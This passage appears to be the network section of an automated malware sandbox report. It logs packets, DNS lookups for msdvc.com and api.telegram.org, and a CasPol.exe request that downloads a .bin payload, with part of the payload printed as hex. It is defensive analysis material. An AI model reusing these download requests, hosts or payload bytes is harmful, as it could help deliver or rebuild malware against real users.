May 10, 2022 14:06:36.654827118 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.654863119 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.654895067 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.655003071 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.655056953 CEST	443	49748	119.18.54.23	192.168.11.20
May 10, 2022 14:06:36.655070066 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:36.655697107 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:06:49.606388092 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.606415033 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.606700897 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.610235929 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.610255003 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.758733034 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.758920908 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.760541916 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.760581017 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.761199951 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.763894081 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.794799089 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.795852900 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.838562965 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.944875002 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.945015907 CEST	443	49749	149.154.167.220	192.168.11.20
May 10, 2022 14:06:49.945182085 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:06:49.947294950 CEST	49749	443	192.168.11.20	149.154.167.220
May 10, 2022 14:08:25.409567118 CEST	49748	443	192.168.11.20	119.18.54.23
May 10, 2022 14:08:25.409617901 CEST	49748	443	192.168.11.20	119.18.54.23

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 10, 2022 14:06:35.252448082 CEST	53529	53	192.168.11.20	1.1.1.1
May 10, 2022 14:06:35.521291971 CEST	53	53529	1.1.1.1	192.168.11.20
May 10, 2022 14:06:49.587388992 CEST	50736	53	192.168.11.20	1.1.1.1
May 10, 2022 14:06:49.595866919 CEST	53	50736	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 10, 2022 14:06:35.252448082 CEST	192.168.11.20	1.1.1.1	0x8f44	Standard query (0)	msdvc.com	A (IP address)	IN (0x0001)
May 10, 2022 14:06:49.587388992 CEST	192.168.11.20	1.1.1.1	0x145	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 10, 2022 14:06:35.521291971 CEST	1.1.1.1	192.168.11.20	0x8f44	No error (0)	msdvc.com		119.18.54.23	A (IP address)	IN (0x0001)
May 10, 2022 14:06:49.595866919 CEST	1.1.1.1	192.168.11.20	0x145	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

msdvc.com

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49748	119.18.54.23	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Timestamp	kBytes transferred	Direction	Data
2022-05-10 12:06:35 UTC	0	OUT	GET /oluwa_RcQBQnZSyJ230.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: msdvc.com Cache-Control: no-cache
2022-05-10 12:06:36 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 10 May 2022 12:06:36 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Sun, 08 May 2022 23:16:58 GMT Accept-Ranges: bytes Content-Length: 215104 Content-Type: application/octet-stream
2022-05-10 12:06:36 UTC	0	IN	Data Raw: 90 6e a6 e7 ec 23 cc 2c 20 42 eb 30 ba 60 94 e6 28 d6 75 5e 48 42 de b1 1c 4b f5 b2 57 4a d7 f5 50 22 5d ff b5 a4 a7 d7 67 e0 2e 3f c8 21 17 80 82 4c ab a3 ff 65 70 00 be 56 a3 86 ff 8e 81 ad 8e d7 aa 31 d6 d0 85 67 bc a7 bd d3 ee be 69 d1 39 a0 c3 dc 5c 90 5a cd 46 a3 81 b2 03 9f 85 b7 b2 9a 8f 4e ea 9b c0 0a ee 1f 73 76 d5 31 d5 a6 07 18 db 1c 4e 26 01 1b 6e 47 e0 f4 cc d8 1f b7 60 ef f6 15 8f 81 5e a6 66 24 8d 51 93 e0 d5 72 31 67 f7 3a f4 f5 7a cc 42 a6 55 24 cd ff 89 36 a7 9e 0b 28 ca 3c 1f cc d5 d3 28 bd 2b d0 74 ab 9f c3 7d 59 c2 09 86 5a 13 f3 fc e3 76 96 8e 35 60 aa 1b f4 51 fd 10 84 3f ab f5 25 48 87 9e e8 3e 3c 65 20 14 72 66 67 25 a2 f2 c9 e6 2b 27 51 e3 2a f0 53 95 70 85 37 a8 f7 aa fd 09 2f 9b 90 fa 9f 13 34 31 f3 ab 46 fe c1 27 64 fc 25 e2 Data Ascii: n#, B0`(u^HBKWJP"]g.?!LepV1gi9\ZFNsv1N&nG`^f$Qr1g:zBU$6(<(+t}YZv5`Q?%H><e rfg%+'Q*Sp7/41F'd%
2022-05-10 12:06:36 UTC	8	IN	Data Raw: 63 6b 2a a6 25 02 24 92 d2 dd 86 e4 72 c8 8a 9b 54 13 ce a8 86 70 f9 ec 93 a9 a6 21 76 2e 90 06 5c 0c d8 93 f0 e8 9c df 89 6b 84 c4 7f 5a 97 a2 8c d6 b3 79 b3 2e ec 16 3c a2 de 5a 01 e6 d9 85 e7 89 8f 7f 7c 6b 1e 16 de 4c 05 ae e3 d2 75 9d 58 94 ef e2 fd 87 d6 98 5b 80 45 44 f5 cf 72 08 4f 77 8f 17 d5 49 a2 a4 c1 b6 52 ea b2 7c dd 82 d2 c3 a5 30 52 05 d8 f0 d8 cc 97 aa 7d c0 28 2f 31 0f 72 e7 28 6f 12 55 8a e3 9a 83 77 da 3e 10 a7 c9 28 d1 ad c9 1c c3 8d 3a 31 d5 d0 01 66 b8 a7 9b d3 11 41 c3 d0 81 a0 de dc 5c 90 47 cd 06 a2 83 b2 03 9f 01 b6 b2 9a cc 4e ea 9b 07 0b ee 1f 77 76 d5 31 d5 a6 07 18 db 1c 4e 26 01 1b 6e 47 2d f5 4c d8 d2 b6 6e f0 43 1b 8f 35 4a 6b 47 9d 9f 2d 5a c1 ad 18 58 14 ca 4a 86 8b 0b ad 27 f3 66 45 ac 91 e7 48 d7 a6 97 4c c6 45 75 b0 Data Ascii: ck*%$rTp!v.\kZy.<Z\|kLuX[EDrOwIR\|0R}(/1r(oUw>(:1fA\GNwv1N&nG-LnC5JkG-ZXJ'fEHLEu
2022-05-10 12:06:36 UTC	15	IN	Data Raw: 8a 65 26 db f8 02 bf de 6c 6f 8e 60 51 db df 69 16 70 53 9f 76 e9 ea 57 f8 1b 15 eb ab ea 63 61 4f 74 2c 02 2e 85 08 6c 85 f5 75 dc 84 c7 24 a5 a3 c3 da 8e f2 9d b9 df bd 28 76 24 80 3d 5d 1f d0 fa ad cb 9c d5 90 e2 9c cd 10 28 4a d8 83 c5 bc 6a a3 49 65 17 10 b1 b3 5e 10 eb b2 d5 ee 8b 85 6a 5a 96 2c 33 fc e1 0c ae e9 c5 b8 d6 54 b8 e5 f1 eb ce 9e 81 25 83 51 57 f8 cf 56 0a 4f 7b 79 21 c1 5a a0 f8 16 b9 77 c6 42 40 d8 88 c1 d0 92 36 61 1c ac 27 d8 e6 93 82 76 83 4c 29 19 2e 72 e7 22 7f 1b 55 8a 83 47 9d 72 2e 3e 12 b8 fa 1b c8 d3 c0 1c c3 89 12 3d d7 d0 83 4f 9b a7 bd d9 91 48 69 d1 85 7d c3 d9 5c 90 58 d2 21 90 98 cc 0a 9f 85 b3 9a 97 8d 4e ec b3 e3 0a ee 15 f3 7f d5 31 d1 7b e5 1c db 1c 4c 39 2f 28 77 39 e9 f4 4c dc 37 b9 6c f0 4a 33 ac 35 57 61 c7 95 Data Ascii: e&lo`QipSvWcaOt,.lu$(v$=](JjIe^jZ,3T%QWVO{y!ZwB@6a'vL).r"UGr.>=OHi}\X!N1{L9/(w9L7lJ35Wa
2022-05-10 12:06:36 UTC	23	IN	Data Raw: 8e c1 95 11 24 ef 40 ff 10 42 3b 6b 33 34 b8 5a aa 9d 15 ad de 1c 8b 02 b0 01 17 19 c6 ef a2 03 2d 5b fb 08 b9 c9 b8 c7 98 68 7a f1 d1 7b 34 61 b7 85 73 eb ed 6e fa 1e 04 e8 ab ae 62 61 4f dc 06 02 2e 8b fd 36 81 f5 73 b1 15 9c da a2 b0 d4 91 a6 e0 f5 84 ce d2 28 f8 93 b6 c5 51 35 b8 fd 85 e2 8f d1 8b 66 86 c6 06 3f 9d 89 9a d4 b7 79 b6 c7 88 10 3e ab dc 51 17 c3 4c fc e7 8f ea fd 72 b5 2a 22 fc 76 d3 bd e3 d0 6f 9d 5a 36 52 c1 28 c2 ad 98 5b 99 61 53 fc fa 5e 08 4f 2f 51 02 d0 4c b9 7d 27 b6 75 c2 9f 7c cc 8d de c1 73 1f 7e 0a d0 55 8b e6 97 ae 47 81 4e 2f 31 12 66 f4 2d ff 03 50 94 79 9b af 7e 16 51 10 a7 df 37 d8 be cc 1c d2 88 25 3e 2b d1 a9 7d ba a0 bf a8 41 41 69 d5 0f 17 7b 0b 32 15 5c a3 83 cc 1c b2 03 99 9a a7 a1 9f 8f 5f ef 84 cc f4 ef 33 7b 7e Data Ascii: $@B;k34Z-[hz{4asnbaO.6s(Q5f?y>QLr*"voZ6R([aS^O/QL}'u\|s~UGN/1f-Py~Q7%>+}AAi{2\_3{~
2022-05-10 12:06:36 UTC	31	IN	Data Raw: 3f f4 19 38 9e 76 cc 13 21 1d c1 b3 fd c7 14 0a a2 12 19 45 4a 47 13 57 bd d6 35 a3 3d 13 85 ec 97 18 2b a9 43 af 5b 4d 36 06 7a 40 d6 3f ab 9f 64 ce d6 1b 86 45 cc 00 17 19 d7 81 50 76 2b 59 8a 4c bf da b5 cd e1 77 3e ab c1 72 2f 4f 2a f9 e6 e8 ee 75 91 0a 1d ea ec 58 62 61 4f 9e 36 06 29 ee 5a cd 80 ff 1b d3 9c f3 4a a5 a1 d6 95 76 f1 86 db c6 c3 25 19 7b 85 15 5f 91 85 fc 85 e9 8f d0 93 77 fb 8d 9c 2c 97 a2 84 be f2 68 bc 59 8a 11 23 bc a7 8d 7f 94 b7 fd ed 8e ea e3 73 b5 26 3f fe 0f 25 fe a2 c7 62 e6 7f bf f3 f9 29 e8 ac 98 5b 88 2a 19 fc e7 58 12 25 6a 3e 70 c0 5a a0 5e 18 d6 e5 c3 9f 76 ce 81 c3 a9 c3 1e 52 01 c3 27 b7 99 96 aa 77 86 23 a0 30 0d 78 eb 20 91 32 05 c1 81 9c e9 59 29 28 1a 7a 1b 28 d1 ad cb 67 8d 8d 3a 35 ca cc ef 70 d7 d5 bc d3 1b 67 Data Ascii: ?8v!EJGW5=+C[M6z@?dEPv+YLw>r/OuXbaO6)ZJv%{_w,hY#s&?%b)[X%j>pZ^vR'w#0x 2Y)(z(g:5pg
2022-05-10 12:06:36 UTC	39	IN	Data Raw: 09 ae 52 14 be ad 07 78 9f cc 5c f1 9d 3c 65 29 32 61 78 3f 22 ef ee 29 aa d1 8b 50 5c b0 40 a1 0a 3d 9a 14 47 0a df 16 e6 ba 84 8a 67 e5 a6 0d e4 25 44 3b 64 56 ac d9 0f 5a 53 b0 92 ea b8 ea 24 36 63 ff 16 3b 64 6c 3a 28 a4 6a ab 9d 15 8c cb 08 87 2a 82 04 0a ed cc c7 83 6d 43 0d f1 02 b5 c4 a2 d4 8b 71 54 ce 3e 73 09 6a 35 85 73 e9 ff 7a e9 e7 14 c1 80 de 70 64 45 e5 20 1d 24 7f d4 e0 82 de 70 e6 b4 63 25 5b 8b c2 84 6b c3 ff 95 fd c3 21 76 58 84 15 44 09 db e8 8f eb 9a a1 ed 62 95 cc 03 28 85 a6 ae 5f bd 68 b6 4c 9f 1c 10 af cb 23 67 eb b6 fc cd 8a ad a8 73 b5 26 25 6c 6a db a0 cc e9 48 8c 51 b2 e8 db da e8 ad 92 85 8a 56 7d fc e6 4c 08 4f 7d 51 22 c1 51 81 78 11 08 77 c2 9e 6f ed 8d c1 9d 88 1e 52 78 d2 2e c9 f0 84 b1 45 c0 49 2f 31 0d 63 fc 37 d9 ec Data Ascii: Rx\<e)2ax?")P\@=Gg%D;dVZS$6c;dl:(j*mCqT>sj5szpdE $pc%[k!vXDb(_hL#gs&%ljHQV}LO}Q"QxwoRx.EI/1c7
2022-05-10 12:06:36 UTC	47	IN	Data Raw: c2 6f 67 a3 cd 78 7c 69 86 f1 2a af c2 99 9e 9f 11 60 d3 8d 86 60 01 d6 4c e6 02 5c 7c fc 0f dd 06 98 be a7 65 2f 9c b2 3c fc 82 31 19 3d 33 70 7b 36 d9 ff c7 35 84 13 f7 8a 56 a3 40 ab 1d 10 0e 04 42 18 2c 15 d0 3c 8a 89 14 11 b5 0a f3 28 4b 56 08 56 bd d8 b1 b5 55 8b 93 c4 0e 15 23 cd c1 ee 17 50 34 e2 8d 0a 44 3e ab 97 bd 91 d1 02 86 88 82 06 78 01 cc eb 8c 69 2f 25 e0 03 bf d0 cf bf 8b 60 55 dc c9 63 21 61 25 18 c1 ff c6 ba ff 19 13 fe 85 d8 65 77 bb f7 2f 04 02 96 fd 32 82 f5 73 cf 9d 10 5c a4 a1 dd ae bb f2 fd 9f b5 2c 20 76 2e fe 1c 7f 1d d0 ef b5 ee 9c a4 9a 62 95 40 10 2c 86 b4 8b c6 b8 7c aa 4f 98 00 14 6b cd 57 16 f8 b2 ec e3 9f 7b 6f 78 b3 00 24 de 9f 07 ae ef d0 61 00 d7 b8 e5 f2 dc 23 ac 98 51 f9 be 56 fc ed 26 01 58 a7 46 d4 4c 75 aa 78 1e Data Ascii: ogx\|i*``L\\|e/<1=3p{65V@B,<(KVVU#P4D>xi/%`Uc!a%ew/2s\, v.b@,\|OkW{ox$a#QV&XFLux
2022-05-10 12:06:36 UTC	55	IN	Data Raw: f7 b3 a7 f5 71 02 4e dd 18 dc de 75 f0 47 13 d9 e1 30 59 c3 c2 9d 02 c7 7c 16 06 24 bf 32 f5 6e 61 b6 e0 e7 f9 69 80 d8 21 64 c3 93 fb 0f ff 61 d9 81 d4 7d 28 d6 4a 8b 07 54 7c 6a 27 c8 05 14 b8 8f a1 2d 9f c6 39 1f 83 35 7c 2a 1a 66 7e 25 da 90 f7 22 ac d2 de 9d 5f b0 42 92 cc 38 9a 0f 2d f1 20 17 c0 b7 ae 91 17 0a a0 73 d7 2e 5d 2c 49 4f be dc 15 8c 87 9c 84 e6 f2 f7 22 c7 69 f9 38 52 33 6c 3c 5c e2 3e ab 99 37 9b d5 1b 84 02 46 01 17 19 a2 08 8b 65 26 5d d9 1e bc da b7 af be 61 51 dd e8 6f 26 69 2b be 55 e9 ee 75 90 fa 14 ed 89 cf 4b 7f 46 f4 23 7c 1b 80 d5 c8 a8 ea 76 de 9d b4 0f a4 a1 d6 e9 93 f2 fd 9f c0 eb 01 75 24 82 6b 60 1c d0 f8 ad c9 9f d5 9c 4a 40 cd 10 26 f8 41 87 c5 b6 6e 94 7f 98 16 3a d6 f8 56 10 ef 9e de e4 89 83 44 a7 b5 2c 39 99 82 04 Data Ascii: qNuG0Y\|$2nai!da}(JT\|j'-95\|*f~%"_B8- s.],IO"i8R3l<\>7Fe&]aQo&i+UuKF#\|vu$k`J@&An:VD,9
2022-05-10 12:06:36 UTC	62	IN	Data Raw: 8c c6 5d bd d3 33 36 7a 73 59 8e 4d d3 dc 6a 8e 58 dc 7d 21 00 65 47 98 de f6 6d a5 fc d7 f9 a2 af e4 51 03 4e d3 18 eb df 75 fc 7d 32 f1 c9 38 36 2a 13 38 08 c1 55 2c 11 24 b9 46 e8 92 61 b2 c2 9e 2c 41 86 f1 02 6e cf e7 85 ed fe 6b c0 88 ed 63 3a db 23 dc 30 55 76 42 02 cc 0c 05 b3 c8 5e 2f 9f c6 45 ee a9 3a 64 21 cc 66 d8 25 dc ef ad 36 ac d6 fc 99 4e a2 49 ac 0b 37 b2 bf 42 12 27 9b 9b b1 86 88 07 0c b7 0b f4 a3 0c 28 61 57 ab f4 ea a4 52 96 a8 e9 a5 cd 21 c7 63 e9 03 58 4e 7d 3b 22 dd 2c ba 8c 10 a0 d6 19 82 2a 81 11 05 02 e5 55 8a 65 2a d7 a0 02 bf db a2 d7 9a 66 47 55 91 72 25 68 3b be 8f e9 ee 75 d3 1c 2d 4e 81 c9 63 70 54 e7 29 13 3e 97 eb 5b 82 f5 75 c9 8a 8c c9 8f b2 cf be f2 f1 fd 95 d7 cf 30 71 0c 92 14 55 17 f8 ed 85 e8 96 c6 8f 4a be cf 10 Data Ascii: ]36zsYMjX}!eGmQNu}2868U,$Fa,Ankc:#0UvB^/E:d!f%6NI7B'(aWR!cXN};",Ue*fGUr%h;u-NcpT)>[u0qUJ
2022-05-10 12:06:36 UTC	70	IN	Data Raw: 34 4b 0d a8 5e 4d 77 04 39 e6 12 ea a2 51 d1 59 9a 00 ad 2b 3f 24 f1 d1 8a 54 95 cd 3d 7c 83 ef 27 a9 fb 67 3c aa dc 71 d6 4e fb c2 42 58 51 f4 6d 28 17 b9 78 a1 8a f4 67 bc da 9d f6 b3 ab ea 6c 55 4c d9 3a e5 8a 77 f6 65 18 80 e3 3a 3c 28 d4 4b 16 9c 58 15 09 33 6f 5f cc 7e 6d a3 d8 c5 4d 78 81 9f 05 65 c3 93 82 c2 c7 12 e8 86 fc 6f 38 dc 5d ff 1a 82 7f 6e 09 b2 47 15 be a1 65 27 8e cb 39 c1 83 35 70 3d 38 61 79 4a e3 ef c2 25 bd dc de 52 5f b0 42 d5 5a 39 9a 03 44 03 2b 78 0d b0 86 83 05 04 c9 a7 e2 2f 57 12 ce a8 42 23 cd b2 43 92 f1 d5 9d 14 22 eb 6f ee 1e 3d 09 6c 3a 23 b8 62 ab 9d 15 5c 08 0e a7 02 be 01 17 19 de e6 f9 70 2e 5b fb 09 97 f4 b1 d1 81 be 53 df ea 75 0f 69 2d d7 42 e9 ee 7d ff 19 15 9d 83 c9 63 00 44 f4 25 d3 2f 81 d5 da 80 f5 75 de 9b Data Ascii: 4K^Mw9QY+?$T=\|'g<qNBXQm(xglUL:we:<(KX3o_~mMxeo8]nGe'95p=8ayJ%R_BZ9D+x/WB#C"o=l:#b\p.[Sui-B}cD%/u
2022-05-10 12:06:36 UTC	78	IN	Data Raw: 83 16 69 09 a8 8d b1 7e ee 26 5a f9 31 90 2e 8e aa 6f 80 d0 b5 b1 e7 07 f4 a2 7a e8 4b c1 2b 8a c4 b4 99 cb 3c 0b 08 25 09 ea a0 68 87 4d 8b 0f 30 8c 24 3e b5 fe 9a 50 8e e7 22 1e ea fc 2b b4 c0 37 2f ae dc 87 9f 69 d3 e5 6a 8e 58 e7 6c 34 0a 47 41 89 de fc b9 b6 f4 ef f4 b3 a1 8a 54 03 4e d9 30 cd dd 3b b8 6f 21 c4 e1 3a 37 3b f3 99 08 33 55 04 05 ed b9 4c d1 1c 74 b0 c8 fe f0 41 7c f1 02 62 d0 9d bc 16 ff 61 d5 8c d4 93 2a d6 4a f9 1a 75 78 6e 09 f5 24 14 be ad 5c 10 9b cc 50 d4 a1 35 76 26 1a 49 7d 25 d6 d7 75 22 ac d6 de aa 58 b0 42 92 3b 38 9a 0f 6a 2f 25 17 cc 99 a5 89 14 00 8e 65 e3 2f 57 3b 64 40 ac d9 9d 13 45 46 97 fc 8e 12 1b ab 62 ff 10 59 35 7d 3c b8 ff 01 af 9d 19 a8 f5 1b 82 20 bb 3a 17 13 c7 d2 c7 64 2c 5b e0 07 ae dc 2b f9 b5 64 51 df e8 Data Ascii: i~&Z1.ozK+<%hM0$>P"+7/ijXl4GATN0;o!:7;3ULtA\|ba*Juxn$\P5v&I}%u"XB;8j/%e/W;d@EFbY5}< :d,[+dQ
2022-05-10 12:06:36 UTC	86	IN	Data Raw: 1b 5c 80 9b 57 f7 33 99 e9 d7 b0 20 54 38 5f b3 ac bf fb 94 10 64 6a ed 3c 79 3a 11 d2 97 ec 75 7a 03 cd e5 b5 7c cc b3 27 fb 3b 89 03 a4 ac 7e 8f ff d8 b5 69 b0 92 d8 72 87 3a c8 2c 97 65 de 4d 46 6c 23 db 27 05 fd 8e 5a 82 5b 90 19 b2 32 3d 22 b5 e9 9a 50 8e ba 56 6f 87 f4 03 fd d1 33 34 b9 dd 48 85 5f ee de 79 9a 6a cc 6a 20 00 7e 7a 98 ca 6c 74 bb e3 c8 e5 bf 89 2c 44 03 44 b6 f1 cd dd 7f cf 77 31 d9 e1 2b 3b 31 cf b5 af c1 54 0e 2d de b8 4c c6 00 2b b2 c8 fe d2 e4 82 f0 04 4c 39 98 94 ea 91 2b d3 87 f6 41 a5 d2 4c f3 1a af 7d 6e 09 b2 4c 14 be ad 67 23 8e c2 42 d4 d3 37 76 2a 24 fd 7a 25 dc ef d6 37 b8 fe 6e 8a 5c ba 5b aa 95 69 9a 05 43 04 09 e0 ca b1 8c a5 22 1b a8 19 ca a0 59 28 67 4e 30 db 13 a4 53 8f 92 fd 8b 02 35 4b 32 ff 10 49 92 7d 2c 35 c8 Data Ascii: \W3 T8_dj<y:uz\|';~ir:,eMFl#'Z[2="PVo34H_yjj ~zlt,DDw1+;1T-L+L9+AL}nLg#B7v*$z%7n\[iC"Y(gN0S5K2I},5
2022-05-10 12:06:36 UTC	94	IN	Data Raw: cc 98 22 98 cc a5 be ac 47 5f 46 aa f5 53 23 f7 29 96 6e 46 b8 d4 3e 51 78 a0 e1 11 c9 7a 0e 5a 97 ed ba e6 37 8c 8c bc b5 20 4f 29 4f 22 d4 91 f0 98 05 96 dd ff 2f 75 09 92 c0 90 ec 6d 6c 11 5c 9f 9b 64 ee 77 5f f9 3d ab 05 9e ac 74 ad 06 a0 b4 6f 98 b8 c9 78 e2 4b d3 3f 9a 1e b2 48 59 6c f5 09 08 10 ea a2 51 43 5f 9a 0c d1 2d 2e 28 d0 ab 3b 50 84 c1 35 66 94 f9 2b af d4 29 c0 ab fa 4f 89 58 05 c9 7c 70 53 f3 43 1b 00 6f 65 d6 e7 63 67 b6 f2 de e7 b4 a1 9a 43 1f b0 d8 1c cb d4 66 f0 72 23 de e1 2b 31 3b 3d 9c 24 cb 53 2c 46 26 b9 46 cd 73 72 b5 c8 e5 fd 76 8d 0e 03 48 d5 88 90 c4 3f 65 d3 81 d4 93 2a d6 4a 9a 78 55 7c 64 25 c2 0a 07 b9 a7 65 2a 88 32 57 d0 81 2d 65 2b 32 61 7a 3b 22 ef ee 25 87 e5 e9 83 4f b7 44 ab 1e 25 64 04 6e 14 37 04 cf af 95 8e 14 Data Ascii: "G_FS#)nF>QxzZ7 O)O"/uml\dw_=toxK?HYlQC_-.(;P5f+)OX\|pSCoecgCfr#+1;=$S,F&FsrvH?eJxU\|d%e2W-e+2az;"%OD%dn7
2022-05-10 12:06:36 UTC	101	IN	Data Raw: 7f c4 e0 7b cf 63 35 df ad 88 5b 3b e7 89 63 9d 77 50 1d a2 79 c6 98 d5 fd 5e e9 a4 0a 84 e6 8d 0d 97 df 8d bf bd 4c a6 b8 ab c8 4f 43 cb 10 69 68 55 bf cf 3c 5d 67 b8 14 06 1b 70 33 5f 91 fb 2b f5 22 98 99 bd 4c 21 72 2c 7d d9 ed 99 05 61 f8 b7 53 fe 2f 60 32 8d d3 de ec 7c 6b ff a2 9e a6 6a ca e3 6a f9 33 9b d5 9e 80 71 87 b8 99 b5 69 b4 8d e1 62 ea 41 c0 27 84 12 a3 47 51 98 0a 24 26 1d f7 a6 71 94 a5 9b 26 bc 2c 20 28 d2 8b 66 51 a8 c3 01 6f ac 33 03 ef d3 33 34 ad cc 5e 00 fb e1 12 05 56 52 f4 61 0a 00 6f 6f 9a ee f3 67 43 f2 c5 f4 44 a1 8b 55 15 43 f2 73 cd d4 6c 08 6e 1c d3 e3 12 0d 20 c3 97 25 f7 4e 09 05 2d a3 b2 c1 43 65 a4 e2 ef f7 69 8f e7 fc 65 ef 9b 8c e1 fe 68 cb 79 fd 45 2e d2 58 a4 2b 58 7c 67 19 23 07 38 bc b0 79 2d 96 d7 a8 fd ae 37 5d Data Ascii: {c5[;cwPy^LOCihU<]gp3_+"L!r,}aS/`2\|kjj3qibA'GQ$&q&, (fQo334^VRaoogCDUCsln %N-CeiehyE.X+X\|g#8y-7]
2022-05-10 12:06:36 UTC	109	IN	Data Raw: 39 d9 de 5a 68 cc 37 d7 b8 f7 24 bf 04 db 59 97 ec 49 9d 32 77 bc 9f fa ba a4 21 6c 33 11 7e 2b eb 41 f8 93 36 d9 ba 22 d0 19 39 99 77 b3 c7 9b 19 a8 69 5c e1 ae fd 5f f9 e3 44 87 e6 81 3e 99 e7 c3 bd ae 3c f8 47 aa e0 31 b2 f0 11 68 7f 42 af 02 a2 4e 67 a9 1e 38 63 73 1f 56 f2 cf 20 f5 28 ee c2 ae b2 24 5c 55 12 dd d5 b9 ea 9a 01 af 7d 64 07 d4 02 88 d9 35 fd 78 7c df b1 9a a6 78 d7 c0 65 b4 c5 7c d4 9d ae 05 c4 c7 a4 b0 6e 3f c0 c9 78 ea 3a 87 2d 9d 1a b4 25 9c 64 70 37 25 05 ff c8 a1 38 34 4a 0b be 3d 06 28 da 81 a8 52 84 eb 2a 6d 87 f8 2b be c2 25 35 81 cd 59 89 5b 05 c9 46 8c 4a ff 6b 27 16 91 6e a5 dc e1 6c b6 f5 dd 0a b2 8d 89 6f 01 65 3a 32 b6 9e 74 f6 6b be 6e cb 3a 36 33 f3 9e 08 b4 54 04 05 2c b9 4c d1 79 6a 99 93 f4 fd 70 78 f1 2e 60 d7 b3 8e Data Ascii: 9Zh7$YI2w!l3~+A6"9wi\_D><G1hBNg8csV ($\U}d5x\|xe\|n?x:-%dp7%84J=(R*m+%5Y[FJk'nloe:2tkn:63T,Lyjpx.`
2022-05-10 12:06:36 UTC	117	IN	Data Raw: 5b 03 8c 36 90 35 9e 18 01 4a 8b 30 c2 ff 6c 03 f7 9d 25 fc 4f f2 3e 02 06 a1 03 81 e7 3e 21 ca de 68 62 df 32 fa a9 f7 35 a3 ad f6 53 93 71 4a 4b d3 5f be 81 e6 37 a4 37 92 33 2e 76 2d ea 57 d7 6a cc d8 90 82 ea 11 06 6e 61 e0 8b 99 19 a8 01 c1 b1 ae f7 76 fb ca 37 8f cc 8b 12 88 fc 84 bf 9c 47 bc 46 af e4 45 21 e6 1a 42 75 46 bf c3 d1 57 4b ab 07 1b e5 76 09 a2 87 c4 22 e2 38 93 81 b7 4c 21 72 2c 7d de fe 5e f9 e5 d3 bc 79 f4 07 87 03 88 d5 81 12 7d 41 17 a0 b6 60 7e c6 c2 71 e2 0b 85 2b 21 ac 7e 85 c9 a5 b4 78 ce a9 c9 78 e2 4b c9 5f ad 1f a3 45 4d 5e 9f 08 24 05 fc c9 a1 80 5b 90 06 b6 13 59 2a da 94 f7 46 86 c1 20 41 b3 f6 03 c8 d1 33 38 c5 26 59 8e 46 d7 ef 62 99 5a 9b 6c 21 00 65 77 53 b1 fe 66 b6 f8 cf f6 b5 ce 52 46 03 44 f4 6a cf db 06 29 6e 30 Data Ascii: [65J0l%O>>!hb25SqJK_773.v-Wjnav7GFE!BuFWKv"8L!r,}^y}A`~q+!~xxK_EM^$[Y*F A38&YFbZl!ewSfRFDj)n0
2022-05-10 12:06:36 UTC	125	IN	Data Raw: 99 6a 2d 51 8c 67 0b 7c 9d a7 08 87 b0 3c 3d b2 7c ec 77 79 93 d1 6e 98 c6 57 7e 60 98 ca a9 09 8e 36 b0 26 91 18 01 4d a3 c9 c2 c9 68 57 64 e2 44 f7 58 de cd f3 06 ab 29 1b c2 00 00 ee fe a9 62 df 32 df 89 f8 24 b5 bf f5 b1 92 76 5b 9f 50 0d dd 98 ed 33 83 d5 6c 32 02 ee 1f cc 46 f6 52 c6 d9 bc 80 e1 30 22 8d 63 86 77 62 18 a2 79 fa 32 d0 9c 5f ef cf 17 70 e6 8b 12 01 e9 ab ae 8a 67 49 46 aa e4 65 1a ff 11 69 76 6e 41 d5 2f 50 4d 2b 61 71 e4 71 1b 7c 70 e8 20 f5 a9 b6 ab be 94 00 a8 2e 56 dc f5 91 f4 9e 07 a9 51 07 2e 73 04 a2 51 e9 8d 7d 6b 0d 82 69 b7 7c c6 52 7e d4 2a a5 0b 68 ac 7e 85 e6 89 bb 69 b0 8c e1 81 e9 41 cc 06 1b 60 c2 4e 46 62 2b f0 24 05 fb 3c 5c af 49 bc 2a 46 3b 2c 28 fa bc 97 50 84 de 21 45 7e ff 2b b8 f9 b1 40 cb d7 59 8a 6c 02 c8 6a Data Ascii: j-Qg\|<=\|wynW~`6&MhWdDX)b2$v[P3l2FR0"cwby2_pgIFeivnA/PM+aqq\|p .VQ.sQ}ki\|R~h~iA`NFb+$<\IF;,(P!E~+@Ylj
